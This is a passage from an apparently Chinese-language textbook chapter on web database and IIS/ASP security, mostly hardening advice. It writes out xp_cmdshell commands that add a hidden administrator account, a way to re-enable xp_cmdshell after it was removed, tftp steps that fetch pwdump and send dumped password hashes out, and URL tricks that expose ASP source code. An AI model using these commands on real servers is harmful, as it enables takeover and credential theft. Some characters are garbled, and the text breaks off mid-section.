Web資料庫(kù)安全性近年來(lái)，安全問(wèn)題逐步成為企業(yè)資訊主管關(guān)注和討論的焦點(diǎn)。一個(gè)好的安全解決方案離不開(kāi)適當(dāng)?shù)陌踩繕?biāo)和策略，而圍繞企業(yè)重點(diǎn)資產(chǎn)和高風(fēng)險(xiǎn)威脅所進(jìn)行的風(fēng)險(xiǎn)評(píng)估則是規(guī)劃的基礎(chǔ)。在規(guī)劃企業(yè)安全時(shí)會(huì)考慮眾多威脅，絕大多數(shù)企業(yè)甚至是聘請(qǐng)的安全公司，往往把注意力集中於網(wǎng)路和操作系統(tǒng)安全，而容易忽視最重要的資料庫(kù)安全。資料庫(kù)安全是一個(gè)廣闊的領(lǐng)域，它作為操作系統(tǒng)之上的應(yīng)用平臺(tái)，其安全與網(wǎng)路和主機(jī)安全息息相關(guān)。

9.1資料庫(kù)安全綜述9.1.1為何需要資料庫(kù)安全？在電腦世界，資料庫(kù)顯然存放著線上資源中最真實(shí)和最有價(jià)值的那部分資產(chǎn)。在資料庫(kù)中，這些數(shù)據(jù)一旦遭受安全威脅將帶來(lái)難以想像的嚴(yán)重後果。企業(yè)對(duì)數(shù)據(jù)的一個(gè)最基本要求，就是要確保它們能夠在任何時(shí)候，被任何授權(quán)用戶方便、高效地訪問(wèn)。為此，企業(yè)會(huì)考慮創(chuàng)造多種對(duì)數(shù)據(jù)的訪問(wèn)通道，並確保它們的安全。但是，這些通道是動(dòng)態(tài)的，即當(dāng)網(wǎng)路擴(kuò)展時(shí)，它們隨之創(chuàng)建或改變，並可能在未察覺(jué)和任何保護(hù)情形下不再可用。通過(guò)對(duì)數(shù)據(jù)庫(kù)自身的安全保護(hù)，企業(yè)將可以在數(shù)據(jù)受到真正的威脅前設(shè)置最後一道防禦屏障。

9.1.2常見(jiàn)的資料庫(kù)安全問(wèn)題及原因雖然資料庫(kù)安全的需求很明顯，但多數(shù)企業(yè)還是不願(yuàn)在發(fā)生了無(wú)可挽回的事件之前就著手考慮和解決相關(guān)的安全問(wèn)題，讓我們考查以下可能危及資料庫(kù)安全的常見(jiàn)因素：（1）脆弱的帳號(hào)設(shè)置。（2）缺乏角色分離。（3）缺乏審計(jì)跟蹤。（4）未利用的資料庫(kù)安全特徵。9.1.3資料庫(kù)安全管理原則一個(gè)強(qiáng)大的資料庫(kù)安全系統(tǒng)應(yīng)當(dāng)確保其中資訊的安全性並對(duì)其有效地控制。下麵列舉的原則有助於企業(yè)在安全規(guī)劃中實(shí)現(xiàn)客戶利益保障，策略制訂以及對(duì)資訊資源的有效保護(hù)。（1）管理細(xì)分和委派原則。（2）最小許可權(quán)原則。許多新的保密規(guī)則針對(duì)對(duì)特定數(shù)據(jù)的授權(quán)訪問(wèn)。（3）帳號(hào)安全原則。用戶帳號(hào)對(duì)於每一個(gè)資料庫(kù)聯(lián)接來(lái)說(shuō)都是必須的。帳號(hào)應(yīng)遵循傳統(tǒng)的用戶帳號(hào)管理方法來(lái)進(jìn)行安全管理。（4）有效的審計(jì)。資料庫(kù)審計(jì)是資料庫(kù)安全的基本要求。9.2Access資料庫(kù)可能被下載的漏洞

一般來(lái)說(shuō)，在提供asp許可權(quán)的Web伺服器上不可能提供代為設(shè)定DSN的服務(wù)，使用的

ACCESSmdb資料庫(kù)可能被人下載，因此asp程式使用的資料庫(kù)通常都局限在使用mdb資料庫(kù)，而mdb遠(yuǎn)端資料庫(kù)所在的位置是使用在第8章資料庫(kù)連接方法中講到過(guò)的

DSN-LESS方法直接在asp中指定的，方法如下：

<%connstr="DBQ="+server.mappath("database/source.mdb")+";DefaultDir=;DRIVER={MicrosoftAccessDriver(*.mdb)};DriverId=25;FIL=MSAccess;ImplicitCommitSync=Yes;MaxBufferSize=512;MaxScanRows=8;PageTimeout=5;SafeTransactions=0;Threads=3;UserCommitSync=Yes;"%>

正如前文所言，在這種情況下mdb庫(kù)很可能被他人下載，從而造成諸如密碼等的洩露。所以，應(yīng)該採(cǎi)取一定的措施嚴(yán)禁code.asp之類的程式，限制mdb的下載。在用Access做後臺(tái)資料庫(kù)時(shí)，如果有人通過(guò)各種方法知道或者猜到了伺服器的Access資料庫(kù)的路徑和數(shù)據(jù)庫(kù)名稱，那麼他就能夠下載這個(gè)Access資料庫(kù)檔，這是非常危險(xiǎn)的。比如：如果Access資料庫(kù)book.mdb放在虛擬目錄下的database目錄下，那麼有人在流覽器中打入：http://someurl/database/book.mdb如果book.mdb資料庫(kù)沒(méi)有事先加密的話，那book.mdb中所有重要的數(shù)據(jù)都掌握在別人的手中。解決方法：（1）為數(shù)據(jù)庫(kù)檔案名稱起個(gè)複雜的非常規(guī)的名字，並把它放在多級(jí)目錄下。（2）不要把資料庫(kù)名寫(xiě)在程式中。（3）使用ACCESS來(lái)為數(shù)據(jù)庫(kù)檔編碼及加密。首先在選取“工具->安全->加密/解密資料庫(kù)，選取資料庫(kù)（如：employer.mdb）”，然後按確定，接著會(huì)出現(xiàn)“資料庫(kù)加密後另存為”的窗口，存為：employer1.mdb。接著employer.mdb就會(huì)被編碼，然後存為employer1.mdb。要注意的是，以上的動(dòng)作並不是對(duì)數(shù)據(jù)庫(kù)設(shè)置密碼，而只是對(duì)數(shù)據(jù)庫(kù)檔加以編碼，目的是為了防止他人使用別的工具來(lái)查看資料庫(kù)檔的內(nèi)容。接下來(lái)為數(shù)據(jù)庫(kù)加密。首先以打開(kāi)經(jīng)過(guò)編碼了的employer1.mdb，在打開(kāi)時(shí)，選擇“獨(dú)佔(zhàn)”方式。然後選取功能表的“工具->安全->設(shè)置資料庫(kù)密碼”，接著輸入密碼即可。為employer1.mdb設(shè)置密碼之後，接下來(lái)如果再使用Access資料庫(kù)檔時(shí)，則Access會(huì)先要求輸入密碼，驗(yàn)證正確後才能夠啟動(dòng)資料庫(kù)。不過(guò)要在ASP程式中的connection對(duì)象的open方法中增加PWD的參數(shù)，這樣即使他人得到了employer1.mdb檔，沒(méi)有密碼他是無(wú)法看到employer1.mdb的。不過(guò)，實(shí)際上已經(jīng)有人編寫(xiě)出專門破解Access資料庫(kù)密碼的程式，因此在使用時(shí)應(yīng)予以注意。9.3SQL資料庫(kù)安全一般網(wǎng)站都是基於資料庫(kù)的，特別是ASP、PHP、JSP這樣的用資料庫(kù)來(lái)動(dòng)態(tài)顯示的網(wǎng)站。很多網(wǎng)站可能多注意的是操作系統(tǒng)的漏洞，但是對(duì)數(shù)據(jù)庫(kù)和這些腳本的安全總是忽略。對(duì)於MSSQLServer資料庫(kù)來(lái)說(shuō)，安全問(wèn)題不僅僅局限在腳本上了。微軟的系統(tǒng)性很強(qiáng)，整個(gè)基於Windows系統(tǒng)的應(yīng)用都有很強(qiáng)的關(guān)聯(lián)性，對(duì)SQLServer來(lái)說(shuō)，基本可以把資料庫(kù)管理和系統(tǒng)管理等同起來(lái)了。SQLServer默認(rèn)的管理員帳號(hào)“sa”的密碼是空的，這給多數(shù)NT伺服器產(chǎn)生一個(gè)安全漏洞。已經(jīng)有專用的程式，能夠利用獲得的資料庫(kù)管理員帳號(hào)執(zhí)行系統(tǒng)命令。在SQLServer中有很多系統(tǒng)存儲(chǔ)過(guò)程，有些是資料庫(kù)內(nèi)部使用的，還有一些就是通過(guò)執(zhí)行存儲(chǔ)過(guò)程來(lái)調(diào)用系統(tǒng)命令。9.3.1系統(tǒng)存儲(chǔ)過(guò)程：xp_cmdshell就是以操作系統(tǒng)命令行解釋器的方式執(zhí)行給定的命令字符串。具體語(yǔ)法是：xp_cmdshell{'command_string'}[,no_output]xp_cmdshell在默認(rèn)情況下，只有sysadmin的成員才能執(zhí)行。但是，sysadmin也可以授予其他用戶這個(gè)執(zhí)行許可權(quán)。在早期版本中，獲得xp_cmdshell執(zhí)行許可權(quán)的用戶在SQLServer服務(wù)的用戶帳戶中運(yùn)行命令。可以通過(guò)配置選項(xiàng)配置SQLServer，以便對(duì)SQLServer無(wú)sa訪問(wèn)許可權(quán)的用戶能夠在SQLExecutiveCmdExecWindowsNT帳戶中運(yùn)行xp_cmdshell。在

SQLServer7.0中，該帳戶稱為SQLAgentCmdExec?，F(xiàn)在對(duì)於SQLServer2000，只要有一個(gè)能執(zhí)行該存儲(chǔ)過(guò)程的帳號(hào)就可以直接運(yùn)行命令了。

對(duì)於NT和WIN2000，當(dāng)用戶不是sysadmin組的成員時(shí)，xp_cmdshell將模擬使用xp_sqlagent_proxy_account指定的SQLServer代理程式的代理帳戶。如果代理帳戶不能用，則xp_cmdshell將失敗。所以即使有一個(gè)帳戶是master資料庫(kù)的擁有者，也不能執(zhí)行這個(gè)存儲(chǔ)過(guò)程。如果有一個(gè)能執(zhí)行xp_cmdshell的資料庫(kù)帳號(hào)，比如是空口令的sa帳號(hào)。那麼就可以執(zhí)行這樣的命令：execxp_cmdshell'netuserrefdom123456/add'execxp_cmdshell'netlocalgroupadministratorsrefdom/add'上面兩次調(diào)用就在系統(tǒng)的管理員組中添加了一個(gè)用戶：refdom。獲得了資料庫(kù)的sa管理員帳號(hào)後，就應(yīng)該可以完全控制這個(gè)機(jī)器了，可見(jiàn)資料庫(kù)安全的重要性。下麵這些存儲(chǔ)過(guò)程都是對(duì)Public可以執(zhí)行的：xp_fileexist用來(lái)確定一個(gè)檔是否存在。xp_getfiledetails可以獲得檔詳細(xì)資料。xp_dirtree可以展開(kāi)你需要瞭解的目錄，獲得所有目錄深度。xp_getnetname可以獲得伺服器名稱。還有可以操作註冊(cè)表的存儲(chǔ)過(guò)程，這些不是對(duì)Public可以執(zhí)行的，需要系統(tǒng)管理員或者授權(quán)執(zhí)行：xp_regaddmultistringxp_regdeletekeyxp_regwrite9.3.2SQLServer的安全配置

除了及時(shí)安裝補(bǔ)丁程式外，還需要加強(qiáng)資料庫(kù)的安全。（1）首先，需要加強(qiáng)象sa這樣的帳號(hào)的密碼。跟系統(tǒng)帳號(hào)的使用配置相似，一般運(yùn)算元據(jù)庫(kù)不要使用象sa這樣的最高許可權(quán)的帳號(hào)，而使用能滿足你的要求的一般帳號(hào)。（2）對(duì)擴(kuò)展存儲(chǔ)過(guò)程進(jìn)行處理。首先就是xp_cmdshell，還有就是上面那些一大堆存儲(chǔ)過(guò)程，都刪掉，一般也用不著。執(zhí)行：usemastersp_dropextendedproc'xp_cmdshell'去掉guest帳號(hào)，阻止非授權(quán)用戶訪問(wèn)，同時(shí)也去掉不必要的網(wǎng)路協(xié)議。（3）加強(qiáng)對(duì)數(shù)據(jù)庫(kù)登陸的日誌記錄，最好記錄所有登陸事件。（4）用管理員帳號(hào)定期檢查所有帳號(hào)，是否密碼為空或者過(guò)於簡(jiǎn)單。加強(qiáng)資料庫(kù)的安全是非常重要的。類似DNS、MAIL等等，資料庫(kù)伺服器往往成為各種入侵的跳板。下麵是搜集到的一些關(guān)於資料庫(kù)的問(wèn)題解答及使用技巧：（1）獲得sa許可權(quán)後，卻不能執(zhí)行xp_cmdshell存儲(chǔ)過(guò)程?？赡苁且呀?jīng)把xp_cmdshell等擴(kuò)展存儲(chǔ)過(guò)程刪除了，可以用這個(gè)存儲(chǔ)過(guò)程把xp_cmdshell恢復(fù)。sp_addextendedproc'xp_cmdshell','xpsql70.dll'（2）如何通過(guò)資料庫(kù)用pwdump獲得系統(tǒng)管理員密碼。先上傳一個(gè)pwdumptftp-iGETpwdump3.exepwdump3.exetftp-iGETlsaext.dlllsaext.dlltftp-iGETpwservice.exepwservice.exepwdump3outfile.txttftpPUToutfile.txtoutfile.txt然後再用解密工具破解這些密碼。（3）如何從資料庫(kù)讀取系統(tǒng)管理員密碼。能讀出加密的密碼是NT的管理員（administrator）帳號(hào)也不能做的。SQLServer能讀出來(lái)是“LocalSystem”帳號(hào)，這個(gè)帳號(hào)比administrator更高一級(jí)。9.4資料庫(kù)的備份

9.4.1數(shù)據(jù)備份的重要性和必要性

在當(dāng)今資訊社會(huì)，最珍貴的財(cái)產(chǎn)並不是電腦軟體，更不是電腦硬體，而是企業(yè)在長(zhǎng)期發(fā)展過(guò)程中所積累下來(lái)的業(yè)務(wù)數(shù)據(jù)。建立網(wǎng)路最根本的用途是要更加方便地傳遞與使用數(shù)據(jù)，但人為錯(cuò)誤、硬碟損壞、電腦病毒、斷電或是天災(zāi)人禍等等都有可能造成數(shù)據(jù)的丟失。所以應(yīng)該強(qiáng)調(diào)指出：“數(shù)據(jù)是資產(chǎn)，備份最重要”。應(yīng)當(dāng)理解備份意識(shí)實(shí)際上就是數(shù)據(jù)的保護(hù)意識(shí)，在危機(jī)四伏的網(wǎng)路環(huán)境中，數(shù)據(jù)隨時(shí)有被毀滅的可能。由於我國(guó)目前軟體盜版現(xiàn)象還沒(méi)有得到徹底的解決，而且大部分的盜版軟體中都隱藏著致命的病毒，這就不可避免的對(duì)使用這些軟體的用戶構(gòu)成極大的潛在威脅。而且，由於病毒本身所具有的智能性與可移植性，很可能在一瞬間這些病毒便會(huì)殃極整個(gè)網(wǎng)路。儘管現(xiàn)在的殺毒軟體層出不窮，但可以肯定的講，無(wú)論這些軟體的功能如何強(qiáng)大，人們永遠(yuǎn)也不可能殺盡所有的病毒，因?yàn)椴《镜母滤俣纫肋h(yuǎn)快於殺毒軟體的更新速度。從這個(gè)意議上講，對(duì)數(shù)據(jù)進(jìn)行備份是非常必要的。當(dāng)今在發(fā)達(dá)國(guó)家，幾乎每一個(gè)網(wǎng)路都會(huì)配置一些專用的外部存儲(chǔ)設(shè)備，而這些設(shè)備確實(shí)在不少災(zāi)難性的數(shù)據(jù)失事中發(fā)揮了扭轉(zhuǎn)乾坤的作用。實(shí)際上，這些備份裝置的費(fèi)用只占伺服器硬體的10%，而它卻能為用戶提供100%的數(shù)據(jù)保護(hù)，從而避免10倍甚至百倍的經(jīng)濟(jì)損失。9.4.2威脅數(shù)據(jù)安全的因素分析曾有一位電腦專家說(shuō)過(guò)，系統(tǒng)災(zāi)難的發(fā)生，不是是否會(huì)，而是遲早的問(wèn)題。造成系統(tǒng)數(shù)據(jù)丟失的原因很多，有些還往往被人們忽視。正確分析威脅數(shù)據(jù)安全的因素，能使系統(tǒng)的安全防護(hù)更有針對(duì)性。導(dǎo)致系統(tǒng)失效的因素主要有以下方面。（1）系統(tǒng)物理故障主要是系統(tǒng)設(shè)備的運(yùn)行損耗、存儲(chǔ)介質(zhì)失效、運(yùn)行環(huán)境(溫度、濕度、灰塵等)對(duì)電腦設(shè)備的影響、電源供給系統(tǒng)故障、人為的破壞等。（2）系統(tǒng)軟體設(shè)計(jì)的缺陷現(xiàn)今操作系統(tǒng)環(huán)境和應(yīng)用軟體種類繁多，結(jié)構(gòu)複雜。軟體設(shè)計(jì)上的缺陷也會(huì)造成系統(tǒng)無(wú)法正常工作。另外，版本的升級(jí)、程式的補(bǔ)丁等都會(huì)對(duì)系統(tǒng)造成影響。（3）使用人員人為失誤由於操作不慎，使用者可能會(huì)誤刪除系統(tǒng)的重要檔，或者修改了影響系統(tǒng)運(yùn)行的參數(shù)，以及沒(méi)有按照規(guī)定要求、操作不當(dāng)導(dǎo)致系統(tǒng)失靈。（4）電腦病毒近年來(lái)，由於電腦病毒感染而破壞電腦系統(tǒng)，造成重大經(jīng)濟(jì)損失的事件屢屢發(fā)生，給電腦技術(shù)的應(yīng)用發(fā)展蒙上陰影。電腦病毒具有自我複製能力，品種繁多，感染性強(qiáng)，特別是在網(wǎng)路環(huán)境下，傳播擴(kuò)散速度更快，令人防不勝防。（5）駭客入侵伴隨著Internet的發(fā)展，網(wǎng)路駭客對(duì)電腦系統(tǒng)的攻擊也成為一大安全隱患。（6）自然災(zāi)害首先，地理環(huán)境決定了我國(guó)具有較高的自然災(zāi)害發(fā)生率，如地震、嚴(yán)重的洪澇災(zāi)害等。其次，火災(zāi)也是一大隱患?；馂?zāi)的發(fā)生概率要比自然災(zāi)害高的多。一般來(lái)講，一個(gè)大型城市每年平均都會(huì)發(fā)生幾百起火災(zāi)事故。雖然災(zāi)害與其他因素相比發(fā)生的頻率並不高，但這樣的災(zāi)害只要發(fā)生一次，就會(huì)給網(wǎng)路帶來(lái)毀滅性的打擊。

9.4.3網(wǎng)路數(shù)據(jù)備份的內(nèi)容及方法備份就是保留一套現(xiàn)有系統(tǒng)的後備系統(tǒng)，這套後備系統(tǒng)或者是與現(xiàn)有系統(tǒng)一模一樣，或者具有能夠代替現(xiàn)有系統(tǒng)的功能。一個(gè)完善的網(wǎng)路數(shù)據(jù)備份應(yīng)包括硬體物理容錯(cuò)和軟體級(jí)數(shù)據(jù)備份，並且能夠自動(dòng)地跨越整個(gè)系統(tǒng)網(wǎng)路平臺(tái)，主要包括以下幾個(gè)方面：（1）構(gòu)造雙機(jī)容錯(cuò)系統(tǒng)在網(wǎng)路中，最關(guān)鍵的網(wǎng)路設(shè)備是檔伺服器，為了保證網(wǎng)路系統(tǒng)連續(xù)運(yùn)行，必須採(cǎi)用檔伺服器雙機(jī)熱備份容錯(cuò)技術(shù)，以解決硬體的故障。從物理上保證系統(tǒng)軟體所需的運(yùn)行環(huán)境。但這種硬體的物理備份並不能消除網(wǎng)路的邏輯錯(cuò)誤，當(dāng)人為的邏輯錯(cuò)誤發(fā)生時(shí)，雙機(jī)熱備份只會(huì)將錯(cuò)誤重複一遍。（2）多平臺(tái)系統(tǒng)檔備份一個(gè)理想的網(wǎng)路數(shù)據(jù)備份方案，是指能夠在一臺(tái)機(jī)器上自動(dòng)地跨平臺(tái)地實(shí)現(xiàn)整個(gè)網(wǎng)路的系統(tǒng)檔備份，包括各平臺(tái)的系統(tǒng)配置、存儲(chǔ)分配和設(shè)備表。因?yàn)榫W(wǎng)路數(shù)據(jù)備份通常使用專用設(shè)備，不可能為每個(gè)系統(tǒng)平臺(tái)或關(guān)鍵的電腦都配置專用備份設(shè)備，所以用網(wǎng)路進(jìn)行高速備份是網(wǎng)路數(shù)據(jù)備份方案所必須考慮的功能。

（3）各類資料庫(kù)的備份隨著資訊資源呈海量之勢(shì)增加，各類資料庫(kù)越來(lái)越複雜和龐大，單純使用備份檔的簡(jiǎn)單方式來(lái)備份數(shù)據(jù)已不再適用，能否將所需要的數(shù)據(jù)從龐大的資料庫(kù)檔中抽取出來(lái)進(jìn)行備份，是網(wǎng)路資料庫(kù)備份的重要一環(huán)。（4）網(wǎng)路故障和災(zāi)難恢復(fù)網(wǎng)路數(shù)據(jù)備份的最終目的是保障網(wǎng)路系統(tǒng)安全運(yùn)行。當(dāng)網(wǎng)路系統(tǒng)出現(xiàn)邏輯錯(cuò)誤時(shí)，網(wǎng)路數(shù)據(jù)備份系統(tǒng)能夠根據(jù)備份的系統(tǒng)檔和各類資料庫(kù)檔在最短的時(shí)間內(nèi)迅速恢復(fù)網(wǎng)路系統(tǒng)。（5）備份任務(wù)管理對(duì)於網(wǎng)路管理員來(lái)說(shuō)，備份是一項(xiàng)繁重的任務(wù)，需要完成大量的手工操作，費(fèi)時(shí)費(fèi)力。因此，網(wǎng)路備份應(yīng)具備實(shí)現(xiàn)定時(shí)和即時(shí)自動(dòng)備份，從而減輕管理員的負(fù)擔(dān)並消除手工操作帶來(lái)的失誤。利用SQLSERVER2000所提供的“資料庫(kù)維護(hù)計(jì)畫(huà)器”，可以實(shí)現(xiàn)數(shù)據(jù)自動(dòng)備份功能。

9.4.4樹(shù)立正確的備份觀念很多電腦用戶和管理人員雖然認(rèn)識(shí)到備份的重要性，具備一定的備份概念，但仍存在一些誤區(qū)。有的用戶認(rèn)為備份就是簡(jiǎn)單地做一份拷貝，因而往往達(dá)不到實(shí)際要求，或是陷入繁瑣耗時(shí)的手工操作中。備份並不僅僅是執(zhí)行拷貝指令或程式，一個(gè)完整的備份方案大致應(yīng)具備以下特點(diǎn)：（1）保證數(shù)據(jù)資料的完整性。（2）能自動(dòng)排程設(shè)定，實(shí)現(xiàn)備份任務(wù)的管理。（3）能對(duì)不同的存儲(chǔ)介質(zhì)進(jìn)行有效管理。（4）支持多種操作系統(tǒng)平臺(tái)。（5）操作簡(jiǎn)便、易於實(shí)現(xiàn)。除了技術(shù)上的要求外，制定周密的計(jì)畫(huà)也很重要。有些系統(tǒng)人員不大重視備份計(jì)畫(huà)的設(shè)計(jì)，缺乏完整的規(guī)劃和策略，使得備份效果大打折扣。要注意備份過(guò)程可能對(duì)一些應(yīng)用系統(tǒng)有影響，要針對(duì)系統(tǒng)運(yùn)行情況，合理安排備份時(shí)段，避免與應(yīng)用程式發(fā)生衝突。總之，備份方案是存儲(chǔ)設(shè)備、備份工具、運(yùn)作方式、恢復(fù)重建方法、操作性、可靠性等方面的綜合考慮。隨著網(wǎng)路的不斷投入和擴(kuò)大，電腦網(wǎng)絡(luò)的安全、數(shù)據(jù)資源的安全日益重要。規(guī)劃一套完整的備份方案並付諸實(shí)施，系統(tǒng)數(shù)據(jù)安全才會(huì)得到有效的保障。9.5IIS的安全性現(xiàn)在很多網(wǎng)站，特別是電子商務(wù)方面的網(wǎng)站，在前臺(tái)上大都用ASP來(lái)實(shí)現(xiàn)，以至於ASP在網(wǎng)站應(yīng)用上十分普遍。ASP是開(kāi)發(fā)網(wǎng)站應(yīng)用的快速工具，但是有些網(wǎng)站管理員只看到ASP的快速開(kāi)發(fā)能力，卻忽視了ASP安全問(wèn)題。通過(guò)asp，可能可以很方便地入侵Web伺服器、竊取伺服器上的檔、捕獲Web資料庫(kù)等系統(tǒng)的用戶口令，甚至惡意刪除伺服器上的的檔，直至造成系統(tǒng)損壞。雖然WINDOWSNTOptionPack所帶的MicrosoftIIS提供了強(qiáng)大的功能，但是IIS在網(wǎng)路安全方面卻是比較危險(xiǎn)的。因?yàn)楹苌儆腥藭?huì)用Windows95/98當(dāng)伺服器，因此重點(diǎn)是NT中的IIS安全問(wèn)題。IIS支持虛擬目錄，通過(guò)在“伺服器屬性”對(duì)話框中的“目錄”標(biāo)籤可以管理虛擬目錄。首先，虛擬目錄隱藏了有關(guān)站點(diǎn)目錄結(jié)構(gòu)的重要資訊。其次，只要兩臺(tái)機(jī)器具有相同的虛擬目錄，就可以在不對(duì)頁(yè)面代碼做任何改動(dòng)的情況下，將Web頁(yè)面從一臺(tái)機(jī)器上移到另一臺(tái)機(jī)器。第三，當(dāng)將Web頁(yè)面放置於虛擬目錄下後，可以對(duì)目錄設(shè)置不同的屬性。當(dāng)需要使用ASP時(shí)，必須將存放.asp檔的目錄設(shè)置為“執(zhí)行”。因此，建議在設(shè)置Web站點(diǎn)時(shí)，將HTML與ASP檔分開(kāi)放置在不同的目錄下，然後將HTML子目錄設(shè)置為“讀”，將ASP子目錄設(shè)置為“執(zhí)行”，不僅方便了對(duì)Web的管理，而且提高了ASP程式的安全性，防止程式內(nèi)容被客戶所訪問(wèn)。儘管微軟稱ASP在網(wǎng)路安全方面的一大優(yōu)點(diǎn)就是用戶不能看到ASP的根源程式，因?yàn)閺腁SP的原理上看，ASP在服務(wù)端執(zhí)行並解釋成標(biāo)準(zhǔn)的HTML語(yǔ)句，再傳送給客戶端流覽器?！罢谡帧备闯淌侥芎芎玫鼐S護(hù)ASP開(kāi)發(fā)人員的版權(quán)，避免駭客通過(guò)分析ASP程式，挑出漏洞。更重要的是有些ASP開(kāi)發(fā)者喜歡把密碼，有特權(quán)的用戶名和路徑直接寫(xiě)在程式中，這樣別人通過(guò)猜密碼、猜路徑，很容易找到攻擊系統(tǒng)的“入口”，這也恰恰是其安全隱患。但是目前已經(jīng)發(fā)現(xiàn)了很多能查看ASP根源程式的漏洞.IIS提供利用ASP而動(dòng)態(tài)產(chǎn)生網(wǎng)頁(yè)的服務(wù)。一個(gè)ASP檔，就是一個(gè)在

HTML網(wǎng)頁(yè)中，直接內(nèi)含程式代碼的檔?；卦儯╮equest）一個(gè)

ASP檔，會(huì)促使

IIS運(yùn)行網(wǎng)頁(yè)中內(nèi)嵌的程式代碼，然後將其運(yùn)行結(jié)果直接回送到流覽器上。另一方面，靜態(tài)的

HTML網(wǎng)頁(yè)，是按照其原來(lái)的樣子回傳到流覽器上面，沒(méi)有經(jīng)過(guò)任何的解析處理。在這裏，IIS是利用檔案的附加檔名來(lái)區(qū)別檔案的形態(tài)。一個(gè)附加檔名為.htm或.html的檔案是屬於靜態(tài)的

HTML檔案，而附加檔名為.asp的檔案則為一個(gè)ASP檔案，通過(guò)流覽器回詢?cè)摍n案，將不會(huì)看到根源程式代碼，而只能看到程式代碼的執(zhí)行結(jié)果。正因?yàn)槿绱耍@一個(gè)ASP就給別人留了後門，或許在所有網(wǎng)路安全漏洞裏面，最不受重視的就是未經(jīng)過(guò)解析的檔內(nèi)容或程式代碼無(wú)意中被顯示出來(lái)的安全漏洞。簡(jiǎn)單的說(shuō)，這些安全漏洞允許使用者從網(wǎng)頁(yè)伺服器騙取動(dòng)態(tài)網(wǎng)頁(yè)裏面的程式代碼?？匆?jiàn)源代碼似乎覺(jué)得並沒(méi)有什麼大礙，但如果ASP程式員將站點(diǎn)的登陸密碼直接寫(xiě)在asp檔裏，那麼一旦源碼被發(fā)現(xiàn)，他人就可以很容易地進(jìn)入本

不該被看到的頁(yè)面，而且很多資料庫(kù)的連接用戶名和密碼也都是直接寫(xiě)在asp檔裏，一旦被發(fā)現(xiàn)，如果資料庫(kù)允許遠(yuǎn)程訪問(wèn)而且沒(méi)有設(shè)防的話就相當(dāng)危險(xiǎn)了。在一些用ASP開(kāi)發(fā)的

BBS程式中，往往使用的是accessmdb資料庫(kù)，如果mdb庫(kù)存放的路徑被獲知，資料庫(kù)就很有可能輕易地被他人下載，加之如果資料庫(kù)裏含有的密碼不加密，那就非常危險(xiǎn)了，獲取密碼的人如果有意進(jìn)行惡意破壞，他只需要以管理員身份登陸就可刪除所有BBS裏的帖子。下一節(jié)從開(kāi)放了ASP服務(wù)的操作系統(tǒng)漏洞和ASP程式本身漏洞入手，闡述ASP安全問(wèn)題，並給出解決方法或建議。9.6ASP漏洞及解決方法有人說(shuō)一臺(tái)不和外面聯(lián)繫的電腦是最安全的電腦，一個(gè)關(guān)閉了所有端口、不提供任何服務(wù)的電腦也是最安全的。駭客經(jīng)常利用我們所開(kāi)放的端口實(shí)施攻擊，這些攻擊最常見(jiàn)的是DoS（拒絕服務(wù)攻擊）。下麵列出了ASP中一些已知的漏洞。9.6.1特殊符號(hào)對(duì)安全的影響

通過(guò)在ASP程式後加個(gè)特殊符號(hào)，就能看到ASP根源程式。IIS2、IIS3、IIS4的一個(gè)廣為人知的漏洞就是::$DATA，通過(guò)它使用IE中的“查看根源程式”或Netscape直接訪問(wèn)該asp檔就能輕而易舉地看到asp代碼。受影響的版本有：Win95+pws、IIS3.0。98+pws4、IIS4.0以上的版本也不存在這個(gè)漏洞。這些特殊符號(hào)包括小數(shù)點(diǎn)、%81、::$DATA。比如：http://someurl/somepage.asp.http://someurl/somepage.asp%81http://someurl/somepage.asp::$DATAhttp://someurl/somepage.asp%2ehttp://someurl/somepage%2e%41sphttp://someurl/somepage%2e%asphttp://someurl/somepage.asp%2e那麼在安裝有IIS3.0和Win95+PWS的流覽中就很容易看到somepage.asp的根源程式。究其根源是因?yàn)閃indowsNT的特有的FAT檔系統(tǒng)：NTFS，這種被稱之為新技術(shù)檔系統(tǒng)的技術(shù)使得

NT具有了較高的安全機(jī)制，但也正是因?yàn)樗a(chǎn)生了不少令人頭痛的隱患。NTFS支持包含在一個(gè)檔中的多數(shù)據(jù)流，而這個(gè)包含了所有內(nèi)容的主數(shù)據(jù)流被稱之為“DATA”，因此使得在流覽器裏直接訪問(wèn)NTFS系統(tǒng)的這個(gè)特性而輕易的捕獲在檔中的腳本程式成為了可能。然而，直接導(dǎo)致::$DATA的原因是由於IIS在解析檔案名的時(shí)候出了問(wèn)題，它沒(méi)有很好地規(guī)範(fàn)檔案名。解決方法和建議：（1）將.asp檔存放的目錄設(shè)置為不可讀（ASP仍能執(zhí)行），這樣html、css等檔就不能放在這個(gè)目錄下，否則它們將不能被流覽。

（2）訪問(wèn)微軟的官方網(wǎng)站，下載並安裝對(duì)應(yīng)系統(tǒng)的補(bǔ)丁程式。9.6.2code.asp檔對(duì)安全的影響在微軟提供的ASP1.0的例程裏有一個(gè).asp檔專門用來(lái)查看其他asp檔的源代碼，該檔為ASPSamp/Samples/code.asp。如果有人把這個(gè)程式上傳到伺服器，而伺服器端沒(méi)有任何防範(fàn)措施的話，他就可以很容易地查看他人的程式。例如：

code.asp?source=/directory/file.asp這是個(gè)比較舊的漏洞了，相信現(xiàn)在很少會(huì)出現(xiàn)這種漏洞。下麵這命令是比較新的：http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp如果asa檔可以被上述方式讀出，資料庫(kù)密碼將以明文形式暴露在駭客眼前。因此，對(duì)於IIS自帶的showaspcode的asp程式檔，刪除該檔或者禁止訪問(wèn)該目錄。9.6.3filesystemobject組件對(duì)安全的影響IIS3、IIS4的ASP的檔操作都可以通過(guò)filesystemobject實(shí)現(xiàn)，包括文本檔的讀寫(xiě)目錄操作、檔的拷貝、改名及刪除等，但是這個(gè)強(qiáng)大的功能也留下了非常危險(xiǎn)的“後門”。利用filesystemobjet可以篡改下載FAT分區(qū)上的任何檔。即使是NTFS分區(qū)，如果許可權(quán)沒(méi)有設(shè)定好的話，同樣也能被破壞。遺憾的是很多管理員只知道讓W(xué)eb伺服器運(yùn)行起來(lái)，很少對(duì)NTFS進(jìn)行許可權(quán)設(shè)置，而NT目錄許可權(quán)的默認(rèn)設(shè)置偏偏安全性又低得可怕。因此，密切關(guān)注伺服器的設(shè)置很重要，儘量將Web目錄建在NTFS分區(qū)上，目錄不要設(shè)定Everyone完全控制，即使是管理員組的成員一般也沒(méi)什麼必要完全控制，只要有讀取、更改許可權(quán)就足夠了。也可以把filesystemobject的組件刪除或者改名。9.6.4HTML語(yǔ)句或者Javascript語(yǔ)句對(duì)安全的影響AS